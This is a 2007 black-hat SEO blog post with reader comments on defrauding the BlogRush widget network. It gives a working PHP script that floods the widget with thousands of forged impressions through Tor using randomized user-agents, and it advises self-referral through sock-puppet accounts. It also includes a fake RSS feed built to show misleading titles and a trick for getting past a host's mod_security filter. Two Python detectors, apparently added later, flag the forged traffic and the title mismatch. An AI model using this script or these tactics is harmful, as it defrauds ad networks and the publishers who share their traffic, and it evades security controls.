Unless you have been living under a stone, you’ve already heard about ShoeMoney’s BlogRush.

To keep things short, I also believe it will fail: when John Chow is getting a 0.3 Click Rate now, imagine when all bloggers start developing ad blindness to that clumsy box.

Besides that, it is also not getting much karma because it is clearly a benefit-the-rich-and-powerful tool.

We can, however, turn it into a great Black Hat tool to promote your nearly bought MFA domain.

Here’s how to do it:

Faking referrals

One thing that immediately called my attention was the fact you were giving credits to your referrals, as far as the 10th generation. So, why not be greedy and keep these credits for yourself? Yes, it is possible. Just register 10 accounts and refer yourself from each one each time, from the first one till the 10th one.

Faking traffic

Now we need traffic. Just run this code for a couple of minutes and watch the magic happen:

<?php
// BlackHatDomainer.com //

$ref = 'http://www.site.com/'; //your site
$id = 12345678; //your blogrush id
for( $i = 0; $i < 5000; $i++ ) {
echo $i.'-';
$s = substr( rand().rand(), 0, 16 );
$url = 'http://widget.blogrush.com/box.php?f='.$id.'&url='.urlencode( $ref ).'&ref=&r=0.'.$s;
$fun = tor_tunnel($ref,$url);
echo $fun."\r\n";
}

function tor_tunnel($ref,$url){
$useragent = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
$os = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');
$agent = $useragent[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$os[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';
$torad = '127.0.0.1:8118';
$timeout = '300';

$go = curl_init();
curl_setopt ($go, CURLOPT_PROXY, $torad);
curl_setopt ($go, CURLOPT_URL, $url);
curl_setopt ($go, CURLOPT_HEADER, 1);
curl_setopt ($go, CURLOPT_USERAGENT, $agent);
curl_setopt ($go, CURLOPT_REFERER, $ref);
curl_setopt ($go, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($go, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($go, CURLOPT_TIMEOUT, $timeout);
curl_setopt ($go, CURLOPT_CONNECTTIMEOUT, 100);
curl_setopt ($go, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($go, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($go, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt ($go, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt ($go, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);

$syn = curl_ex*ec($go);
curl_close($go);
return $syn;
}

?>

Notice how I use random OS and USERAGENT codes. Also, forget proxies, this code is using TOR!

Note: You will need Tor, Privoxy and PHP with CURL. In case you have only PHP, use fileopen and a list of proxies, or no proxy at all. It will work fine, lol.

Note 2: Also remove the * in “curl_ex*ec”. I can’t write c u r l _ e x e c in here or I’ll get a 503 from my host company watchdog mod_security script! :S
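Seen from the widget operator's side, the traffic this script produces is easy to recognise in request logs: one widget id, many source addresses in a short window, and user-agent strings in a shape no real browser sends. The following is an added example, not code from the original post; the log format, the widget id 87654321, the addresses and the thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Shape emitted by the script above: name/N.N (os N.N; en-US;)
SYNTHETIC_UA = re.compile(r"^[A-Za-z_ ]+/\d\.\d \([A-Za-z0-9 ]+ \d\.\d; en-US;\)$")
LOG_LINE = re.compile(r'^(\S+) \[(\d+)\] "GET (\S+)" "([^"]*)"$')

def _line(ip, ts, wid, ua):
    # Constructed log format (assumption): ip [epoch] "GET path" "user-agent"
    return f'{ip} [{ts}] "GET /box.php?f={wid}&url=http%3A%2F%2Fblog.example%2F&ref=&r=0.{ts}" "{ua}"'

FIREFOX = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
MSIE = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
# Constructed sample traffic, not real logs: one forged widget id, one organic.
SAMPLE_LOG = "\n".join([
    _line("192.0.2.10", 1190300000, "12345678", "Opera/3.4 (Linux 5.2; en-US;)"),
    _line("198.51.100.4", 1190300002, "12345678", "ia_archiver/1.0 (Windows 2000 7.3; en-US;)"),
    _line("203.0.113.77", 1190300003, "12345678", "Mozilla/6.1 (OSX 4.4; en-US;)"),
    _line("192.0.2.201", 1190300005, "12345678", "Microsoft Internet Explorer/8.0 (Windows XP 1.9; en-US;)"),
    _line("198.51.100.90", 1190300006, "12345678", "Opera/2.7 (Windows NT 3.3; en-US;)"),
    _line("203.0.113.5", 1190300001, "87654321", FIREFOX),
    _line("203.0.113.5", 1190300009, "87654321", FIREFOX),
    _line("192.0.2.33", 1190300012, "87654321", MSIE),
    _line("192.0.2.33", 1190300020, "87654321", MSIE),
    _line("198.51.100.61", 1190300031, "87654321", FIREFOX),
])

def suspicious_widgets(log, min_hits=5, min_synthetic=0.8, max_span_s=60):
    """Return {widget_id: stats} for ids whose impressions look scripted."""
    hits = defaultdict(list)
    for line in log.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not widget requests
        ip, ts, path, ua = m.groups()
        wid = parse_qs(urlsplit(path).query).get("f", [""])[0]
        hits[wid].append((int(ts), ip, ua))
    flagged = {}
    for wid, rows in hits.items():
        synthetic = sum(bool(SYNTHETIC_UA.match(ua)) for _, _, ua in rows) / len(rows)
        span = max(r[0] for r in rows) - min(r[0] for r in rows)
        if len(rows) >= min_hits and synthetic >= min_synthetic and span <= max_span_s:
            flagged[wid] = {"hits": len(rows), "synthetic_ua": synthetic,
                            "distinct_ips": len({ip for _, ip, _ in rows}), "span_s": span}
    return flagged
```

The user-agent signature only matches this exact generator, so treat it as one signal alongside per-widget request rate and source-address dispersion.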

Faking posts

Finally, we need clicks! That’s easy; you just have to fake your post titles. Here’s how to do it: just fake an RSS channel.

<?xml version="1.0" encoding="ISO-8859-1" ?>
<rss version="2.0">
<channel>
<title>Your site</title>
<link>http://www.site.com</link>
<description>Your description</description>
<language>en-us</language>

<item>
<category>BlogRush</category>
<title>Your FAKE title!</title>
<link>http://www.site.com/your_real_link</link>
</item>
</channel>
</rss>

Save the above as www.yoursite.com/site.rss and direct BlogRush there.
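A syndication network that accepts a submitted feed can catch this kind of title spoofing by comparing each item's advertised title with the title of the page the link actually serves. The following is an added example, not part of the original post; the feed, URLs, page contents and the 0.5 overlap threshold are constructed assumptions, and `fetch` stands in for a real HTTP fetch.

```python
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

class _TitleParser(HTMLParser):
    """Collects the text inside the page's <title> element."""
    def __init__(self):
        super().__init__()
        self.in_title, self.text = False, ""
    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False
    def handle_data(self, data):
        if self.in_title:
            self.text += data

def _words(s):
    return set(re.findall(r"[a-z0-9]+", s.lower()))

def mismatched_items(feed_bytes, fetch, min_overlap=0.5):
    """List feed items whose title shares too few words with the linked page's title."""
    out = []
    for item in ET.fromstring(feed_bytes).iter("item"):
        title, link = item.findtext("title", ""), item.findtext("link", "")
        parser = _TitleParser()
        parser.feed(fetch(link))
        feed_words = _words(title)
        # Fraction of the advertised title's words that appear in the real page title
        overlap = len(feed_words & _words(parser.text)) / len(feed_words) if feed_words else 0.0
        if overlap < min_overlap:
            out.append((link, title, parser.text.strip(), round(overlap, 2)))
    return out

# Constructed feed and pages (hypothetical URLs), standing in for live fetches.
FEED = b"""<?xml version="1.0" encoding="ISO-8859-1" ?>
<rss version="2.0"><channel><title>Example</title>
<item><title>Ten tips for faster WordPress themes</title><link>http://blog.example/tips</link></item>
<item><title>Free laptop giveaway winners announced</title><link>http://blog.example/landing</link></item>
</channel></rss>"""
PAGES = {
    "http://blog.example/tips": "<html><head><title>Ten Tips for Faster WordPress Themes | Example Blog</title></head></html>",
    "http://blog.example/landing": "<html><head><title>Cheap insurance quotes</title></head></html>",
}
```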

Acknowledgments: Thanks go to Blackhat’s Diary for easing my task (I didn’t have to sniff HTTP requests to find the URL and parameters to pass) and also to John Chow for the idea of a custom RSS, although he made it the whitish way and didn’t cloak the URLs.

Update: Blackhat’s Diary dude, what a bad temper you got! I got only the URL from your code and, besides that, my agent/os random function is 10000 times better than yours. Also, 99% of people out there have CURL and NO file_get_contents.

Update (04Oct07): CURL code updated.

Commentary

  1. Paul wrote on 20. Sep 2007

    Does this method create hits from multiple ips?

  2. k wrote on 20. Sep 2007

    Yes, it will create hits from multiple IPs.

  3. David Hopkins wrote on 20. Sep 2007

    Nice script :)

    Stumbled.

  4. Paul wrote on 23. Sep 2007

    Hi, I got Tor and Privoxy set up but I don't think I'm using it right. It's only changing IP every 10 minutes or so, not on every request. I'm connecting to 127.0.0.1:8118, which I think is the Privoxy port? I tried connecting to the Tor one, which is 9051 for me, but get connection refused. I suppose the problem is I don't really understand what these programs are doing :) (btw I think this could have a lot more applications than just BlogRush if set up right)

  5. curl_exec wrote on 24. Sep 2007

    I had to see what happens if I put curl_exec in the comments

  6. bigdadgib wrote on 31. Oct 2007

    What is curl_exec anyway?

  7. SlightlyShadySEO wrote on 02. Dec 2007

    curl_exec EXECutes the CURL query you set up…

  8. eliena andrews wrote on 03. Dec 2007

    That was a cool exploit for BlogRush. Have they patched their system for this?

    Eliena
